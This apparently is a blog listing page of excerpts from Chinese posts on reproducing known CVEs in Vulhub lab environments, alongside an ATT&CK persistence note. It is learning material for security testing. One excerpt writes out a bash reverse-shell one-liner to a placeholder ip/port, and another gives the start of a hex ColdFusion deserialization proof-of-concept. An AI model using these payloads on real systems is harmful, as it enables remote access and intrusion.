渗透
建瓯最坏
APT组织跟踪,病毒分析,逆向/二进制研究人员
展开
-
ATT&CK - T1546.003 | 事件触发的执行.WMI事件订阅
事件触发的执行:WMI事件订阅目的出现场景ATT&CK - T1546.003检查方式目的建立持久性出现场景比如一些病毒的启动方式、包括但不限于勒索,功能类似计划任务ATT&CK - T1546.003攻击者可以通过执行管理规范(WMI)事件订阅触发的恶意内容来建立持久性并提升特权。使用WMI的功能来订阅事件并在事件发生时执行任意代码检查方式Sysinals、Autoruns等工具来检测可能尝试持久性的WMI更改;监视可用于注册WMI持久性的进程和命令行参数,例如Regi原创 2021-03-16 14:31:47 · 428 阅读 · 0 评论 -
利用Vulnhub复现漏洞 - Nginx 配置错误导致漏洞
Nginx 配置错误导致漏洞Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现nginx.confMistake 1\. CRLF注入漏洞Mistake 2\. 目录穿越漏洞Mistake 3\. add_header被覆盖Vulnhub官方复现教程https://vulhub.org/#/environments/nginx/insecure-configuration/漏洞原理...转载 2019-07-15 16:53:55 · 1094 阅读 · 0 评论 -
POC - Adobe ColdFusion 反序列化漏洞(CVE-2017-3066)
安装010Editer下载链接:http://www.pc6.com/softview/SoftView_55129.html复制POC的十六进制00 03 00 00 00 01 00 00 00 00 00 00 00 01 11 0A07 47 6F 72 67 2E 61 70 61 63 68 65 2E 61 78 6973 32 2E 75 74 69 6C 2E 4D 6...原创 2019-10-16 16:58:19 · 1439 阅读 · 0 评论 -
利用Vulnhub复现漏洞 - Discuz!X ≤3.4 任意文件删除漏洞
Apache SSI 远程命令执行漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现FormhashCookie发送数据包Vulnhub官方复现教程https://vulhub.org/#/environments/httpd/ssi-rce/漏洞原理在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持,我们可以上传一个...原创 2019-06-28 21:29:17 · 3261 阅读 · 3 评论 -
利用Vulnhub复现漏洞 - Imagetragick 命令执行漏洞(CVE-2016–3714)
Imagetragick 命令执行漏洞(CVE-2016–3714)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现端口设置浏览器设置BurpSuit设置上传POC反弹shell POCVulnhub官方复现教程https://github.com/vulhub/vulhub/blob/master/imagemagick/imagetragick/README.zh-cn.md漏...原创 2019-07-10 14:44:56 · 1925 阅读 · 0 评论 -
利用Vulnhub复现漏洞 - Jackson-databind 反序列化漏洞(CVE-2017-7525)
Jackson-databind 反序列化漏洞(CVE-2017-7525)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现端口设置浏览器设置BurpSuit设置CVE-2017-7525CVE-2017-17485Vulnhub官方复现教程https://vulhub.org/#/environments/jackson/CVE-2017-7525/漏洞原理Jackson-da...原创 2019-07-10 15:00:08 · 8363 阅读 · 1 评论 -
利用Vulnhub复现漏洞 - JBoss JMXInvokerServlet 反序列化漏洞
JBoss JMXInvokerServlet 反序列化漏洞Vulnhub官方复现教程漏洞原理复现过程启动环境端口设置浏览器设置BurpSuit设置复现漏洞序列化数据生成发送POCEXPVulnhub官方复现教程https://vulhub.org/#/environments/jboss/JMXInvokerServlet-deserialization/漏洞原理这是经典的JBoss反序...原创 2019-07-10 17:54:36 · 3072 阅读 · 7 评论 -
利用Vulnhub复现漏洞 - JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)
JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现发送POC通过命令通过`BurpSuit`发送检测POC是否成功Vulnhub官方复现教程https://vulhub.org/#/environments/jboss/CVE-2017-7504/漏洞原理Red Hat JBoss Applica...原创 2019-07-11 14:19:14 · 1812 阅读 · 0 评论 -
利用Vulnhub复现漏洞 - ffmpeg 任意文件读取漏洞/SSRF漏洞 (CVE-2016-1897/CVE-2016-1898)
ffmpeg 任意文件读取漏洞/SSRF漏洞 (CVE-2016-1897/CVE-2016-1898)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现Vulnhub官方复现教程https://vulhub.org/#/environments/ffmpeg/CVE-2016-1897/漏洞原理在FFMpeg2.X 由于在解析HTTP Live Streaming流媒体m3u8文...原创 2019-07-05 16:19:52 · 2246 阅读 · 8 评论 -
利用Vulnhub复现漏洞 - Discuz 7.x/6.x 全局变量防御绕过导致代码执行
Discuz 7.x/6.x 全局变量防御绕过导致代码执行Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现Vulnhub官方复现教程https://vulhub.org/#/environments/httpd/ssi-rce/漏洞原理由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过...原创 2019-06-28 20:09:12 · 929 阅读 · 0 评论 -
利用Vulnhub复现漏洞 - Couchdb 任意命令执行漏洞(CVE-2017-12636)
Couchdb 任意命令执行漏洞(CVE-2017-12636)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现1.6.0 下的说明2.1.0 下的说明利用脚本Vulnhub官方复现教程https://vulhub.org/#/environments/couchdb/CVE-2017-12636/漏洞原理Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱...原创 2019-06-28 18:50:53 · 1057 阅读 · 1 评论 -
利用Vulnhub复现漏洞 - HTTPoxy漏洞(CVE-2016-5385)
HTTPoxy漏洞(CVE-2016-5385)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现端口设置浏览器设置BurpSuit设置发出请求Vulnhub官方复现教程https://vulhub.org/#/environments/cgi/httpoxy/漏洞原理参考:http://www.laruence.com/2016/07/19/3101.html简单来说,根据RF...原创 2019-07-09 18:03:25 · 2365 阅读 · 3 评论 -
利用Vulnhub复现漏洞 - Couchdb 垂直权限绕过漏洞(CVE-2017-12635)
Couchdb 垂直权限绕过漏洞(CVE-2017-12635)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现Vulnhub官方复现教程https://vulhub.org/#/environments/couchdb/CVE-2017-12635/漏洞原理Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格...原创 2019-06-28 18:05:56 · 1189 阅读 · 0 评论 -
利用Vulnhub复现漏洞 - Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396)
Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现Vulnhub官方复现教程https://vulhub.org/#/environments/confluence/CVE-2019-3396/漏洞原理Atlassian Confluence是企业广泛使用的wiki系统,其6.14.2版本...原创 2019-06-28 16:40:24 · 2116 阅读 · 0 评论 -
利用Vulnhub复现漏洞 - 心脏出血漏洞(CVE-2014-0160)
心脏出血漏洞(CVE-2014-0160)Vulnhub官方复现教程复现过程启动环境漏洞复现ssltest.pyVulnhub官方复现教程https://github.com/vulhub/vulhub/blob/master/openssl/heartbleed/README.zh-cn.md复现过程启动环境https://blog.csdn.net/JiangBuLiu/articl...原创 2019-07-09 16:45:32 · 2321 阅读 · 1 评论 -
利用Vulnhub复现漏洞 - OpenSSH 用户名枚举漏洞(CVE-2018-15473)
OpenSSH 用户名枚举漏洞(CVE-2018-15473)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现CVE-2018-15473-ExploitVulnhub官方复现教程https://vulhub.org/#/environments/openssh/CVE-2018-15473/漏洞原理OpenSSH 7.7前存在一个用户名枚举漏洞,通过该漏洞,攻击者可以判断某个用...原创 2019-07-09 16:00:38 · 7925 阅读 · 3 评论 -
利用Vulnhub复现漏洞 - Hadoop YARN ResourceManager 未授权访问
Hadoop YARN ResourceManager 未授权访问Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现EXPVulnhub官方复现教程https://vulhub.org/#/environments/hadoop/unauthorized-yarn/漏洞原理http://archive.hack.lu/2016/Wavestone - Hack.lu 2016 - ...原创 2019-07-09 15:26:29 · 2506 阅读 · 0 评论 -
利用Vulnhub复现漏洞 - Nginx越界读取缓存漏洞(CVE-2017-7529)
Nginx越界读取缓存漏洞(CVE-2017-7529)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现Vulnhub官方复现教程https://vulhub.org/#/environments/nginx/CVE-2017-7529/漏洞原理Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。缓存的部分存储在文件中,每个缓存文件包括“文件头”+“HTTP...原创 2019-07-15 11:03:23 · 2879 阅读 · 0 评论 -
利用Vulnhub复现漏洞 - ffmpeg 任意文件读取漏洞环境
ffmpeg 任意文件读取漏洞环境Vulnhub官方复现教程漏洞原理复现漏洞启动环境x509: certificate has expired or is not yet valid漏洞复现Vulnhub官方复现教程https://vulhub.org/#/environments/ffmpeg/phdays/漏洞原理FFmpeg可以处理HLS播放列表的特性,而播放列表可以引用外部文件。...原创 2019-07-05 17:40:22 · 1076 阅读 · 2 评论 -
利用Vulnhub复现漏洞 - Nexus Repository Manager 3 远程命令执行漏洞(CVE-2019-7238)
Nexus Repository Manager 3 远程命令执行漏洞(CVE-2019-7238)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现端口设置浏览器设置BurpSuit设置发送请求Vulnhub官方复现教程https://vulhub.org/#/environments/nexus/CVE-2019-7238/漏洞原理Nexus Repository Manage...原创 2019-07-12 16:55:21 · 2500 阅读 · 1 评论 -
利用Vulnhub复现漏洞 - Mysql 身份认证绕过漏洞(CVE-2012-2122)
Mysql 身份认证绕过漏洞(CVE-2012-2122)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现Vulnhub官方复现教程https://vulhub.org/#/environments/mysql/CVE-2012-2122/漏洞原理当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也...原创 2019-07-12 16:34:18 · 2685 阅读 · 0 评论 -
利用Vulnhub复现漏洞 - mini_httpd任意文件读取漏洞(CVE-2018-18778)
mini_httpd任意文件读取漏洞(CVE-2018-18778)Vulnhub官方复现教程漏洞原理复现过程启动环境端口设置浏览器设置BurpSuit设置漏洞复现Vulnhub官方复现教程https://vulhub.org/#/environments/mini_httpd/CVE-2018-18778/漏洞原理Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下...原创 2019-07-12 16:26:04 · 1990 阅读 · 0 评论 -
利用Vulnhub复现漏洞 - Magento 2.2 SQL注入漏洞
Magento 2.2 SQL注入漏洞Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现登录管理员账号使用POC读取管理员的session原理理解端口设置浏览器设置BurpSuit设置Vulnhub官方复现教程https://vulhub.org/#/environments/magento/2.2-sqli/漏洞原理Magento(麦进斗)是一款新的专业开源电子商务平台,采用ph...原创 2019-07-12 16:12:52 · 2533 阅读 · 0 评论 -
利用Vulnhub复现漏洞 - Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)
Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现Vulnhub官方复现教程https://vulhub.org/#/environments/log4j/CVE-2017-5645/漏洞原理Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log...原创 2019-07-12 14:02:25 · 6146 阅读 · 1 评论 -
利用Vulnhub复现漏洞 - libssh 服务端权限认证绕过漏洞(CVE-2018-10933)
libssh 服务端权限认证绕过漏洞(CVE-2018-10933)Vulnhub官方复现教程漏洞原理复现过程启动环境PoC (pocsuite 插件)执行任意命令Vulnhub官方复现教程https://github.com/vulhub/vulhub/blob/master/libssh/CVE-2018-10933/README.zh-cn.md漏洞原理libssh是一个提供ssh相...原创 2019-07-12 13:38:16 · 1937 阅读 · 0 评论 -
利用Vulnhub复现漏洞 - Jupyter Notebook 未授权访问漏洞
Jupyter Notebook 未授权访问漏洞Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现我滴个神呀Vulnhub官方复现教程https://vulhub.org/#/environments/jupyter/notebook-rce/漏洞原理Jupyter Notebook(此前被称为 IPython notebook)是一个交互式笔记本,支持运行 40 多种编程语言。...原创 2019-07-12 11:11:23 · 2243 阅读 · 0 评论 -
利用Vulnhub复现漏洞 - Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境
@[TOC](Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境)Vulnhub官方复现教程https://vulhub.org/#/environments/joomla/CVE-2017-8917/漏洞原理com_fields组件出现漏洞,com_fields组件是在3.7版本添加的,如果你使用此版本,将受到影响,并应尽快更新。这个组件可以公开访问,意味着任何...原创 2019-07-12 10:51:35 · 4082 阅读 · 0 评论 -
利用Vulnhub复现漏洞 - Joomla 3.4.5 反序列化漏洞(CVE-2015-8562)
Joomla 3.4.5 反序列化漏洞(CVE-2015-8562)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现并未成功POCVulnhub官方复现教程https://vulhub.org/#/environments/joomla/CVE-2015-8562/漏洞原理本漏洞根源是PHP5.6.13前的版本在读取存储好的session时,如果反序列化出错则会跳过当前一段数据而...原创 2019-07-11 18:01:50 · 2561 阅读 · 0 评论 -
利用Vulnhub复现漏洞 - Jmeter RMI 反序列化命令执行漏洞(CVE-2018-1297)
Jmeter RMI 反序列化命令执行漏洞(CVE-2018-1297)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现利用ysoserial检查结果Vulnhub官方复现教程https://vulhub.org/#/environments/jmeter/CVE-2018-1297/漏洞原理Apache JMeter是美国阿帕奇(Apache)软件基金会的一套使用Java语言编...原创 2019-07-11 17:04:03 · 2475 阅读 · 0 评论 -
利用Vulnhub复现漏洞 - Jenkins远程命令执行漏洞(CVE-2018-1000861)
Jenkins远程命令执行漏洞(CVE-2018-1000861)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现POC检验Vulnhub官方复现教程https://vulhub.org/#/environments/jenkins/CVE-2018-1000861/漏洞原理Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这...原创 2019-07-11 16:51:22 · 4543 阅读 · 0 评论 -
利用Vulnhub复现漏洞 - Jenkins-CI 远程代码执行漏洞(CVE-2017-1000353)
Jenkins-CI 远程代码执行漏洞(CVE-2017-1000353)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现生成序列化字符串发送数据包,执行命令检验Vulnhub官方复现教程https://vulhub.org/#/environments/jenkins/CVE-2017-1000353/漏洞原理参考阅读 https://blogs.securiteam.com/...原创 2019-07-11 16:00:46 · 2290 阅读 · 4 评论 -
Linux下的渗透命令学习 - 反弹Shell
反弹ShellShell最常见命令和原理监听命令Shell最常见命令和原理bash -i >& /dev/tcp/ip/port 0>&1bash -i代表在本地打开一个bash,然后就是/dev/tcp/ip/port, /dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,>&...原创 2019-07-11 10:25:46 · 577 阅读 · 0 评论 -
利用Vulnhub复现漏洞 - Adobe ColdFusion 反序列化漏洞(CVE-2017-3066)
Adobe ColdFusion 反序列化漏洞(CVE-2017-3066)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现POC500错误Vulnhub官方复现教程https://vulhub.org/#/environments/coldfusion/CVE-2017-3066/漏洞原理Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的C...原创 2019-06-28 14:59:31 · 5182 阅读 · 10 评论 -
利用Vulnhub复现漏洞 - Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)
Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现Vulnhub官方复现教程https://vulhub.org/#/environments/coldfusion/CVE-2010-2861/漏洞原理Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(Cold...原创 2019-06-28 14:08:39 · 953 阅读 · 0 评论 -
利用Vulnhub复现漏洞 - Nginx 文件名逻辑漏洞(CVE-2013-4547)
Nginx 文件名逻辑漏洞(CVE-2013-4547)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现Vulnhub官方复现教程https://vulhub.org/#/environments/nginx/CVE-2013-4547/漏洞原理影响版本:Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7参考链接:http://cve.mitre.or...原创 2019-07-12 18:00:38 · 863 阅读 · 0 评论 -
利用Vulnhub复现漏洞 - AppWeb认证绕过漏洞(CVE-2018-8715)
AppWeb认证绕过漏洞(CVE-2018-8715)Vulnhub官方复现教程漏洞原理漏洞环境启动环境浏览器BurpSuite漏洞复现【注意】Burp不知名原因,会消失最后一个字节利用sessionVulnhub官方复现教程https://vulhub.org/#/environments/appweb/CVE-2018-8715/漏洞原理AppWeb是Embedthis Softwar...原创 2019-06-27 14:56:38 · 1087 阅读 · 0 评论 -
利用Vulnhub复现漏洞 - ActiveMQ 反序列化漏洞(CVE-2015-5254)
ActiveMQ 反序列化漏洞(CVE-2015-5254)Vulnhub官方复现教程漏洞原理复现漏洞启动环境TerminalFirefoxVulnhub官方复现教程https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2015-5254/README.zh-cn.md漏洞原理https://www.jianshu.com/p/...原创 2019-06-27 14:41:27 · 1034 阅读 · 0 评论 -
利用Vulnhub复现漏洞 - ActiveMQ任意文件写入漏洞(CVE-2016-3088)
可点击目录分类快捷浏览↓Vulnhub官方复现教程漏洞原理背景简述漏洞详情复现漏洞启动环境写入webshell上传webshell设置浏览器代理配置(与Burp拦截设置一致)打开Burp Suite设置拦截端口(主机)(与浏览器设置一致)在Burp Suite的拦截抓包中写入WebShell移动到web目录下的api文件夹中:原教程移动到web目录下的api文件夹(/opt/activemq/we...原创 2019-06-27 14:24:40 · 1876 阅读 · 2 评论 -
搭建Vulhub漏洞测试靶场+成功环境
搭建Vulnhub漏洞测试靶场文章目录搭建Vulnhub漏洞测试靶场官方地址及时做好环境快照环境是否正常运行检查docker是否运行没运行则运行进入对应漏洞文件夹搭建及运行漏洞环境:官方地址https://vulhub.org/#/docs/及时做好环境快照我个人使用的是VMWare+Kali,按照官方地址提供的教程安装好Docker+Vulnhub就马上保存快照了每次做完都还原快照开...原创 2019-06-27 10:36:22 · 11982 阅读 · 0 评论 -
利用Vulnhub复现漏洞 - ElasticSearch 目录穿越漏洞(CVE-2015-3337)测试环境
ElasticSearch 目录穿越漏洞(CVE-2015-3337)测试环境Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现head插件Vulnhub官方复现教程https://vulhub.org/#/environments/elasticsearch/CVE-2015-3337/漏洞原理在安装了具有“site”功能的插件以后,插件目录使用…/即可向上跳转,导致目录穿越漏洞...原创 2019-07-02 17:51:18 · 1730 阅读 · 0 评论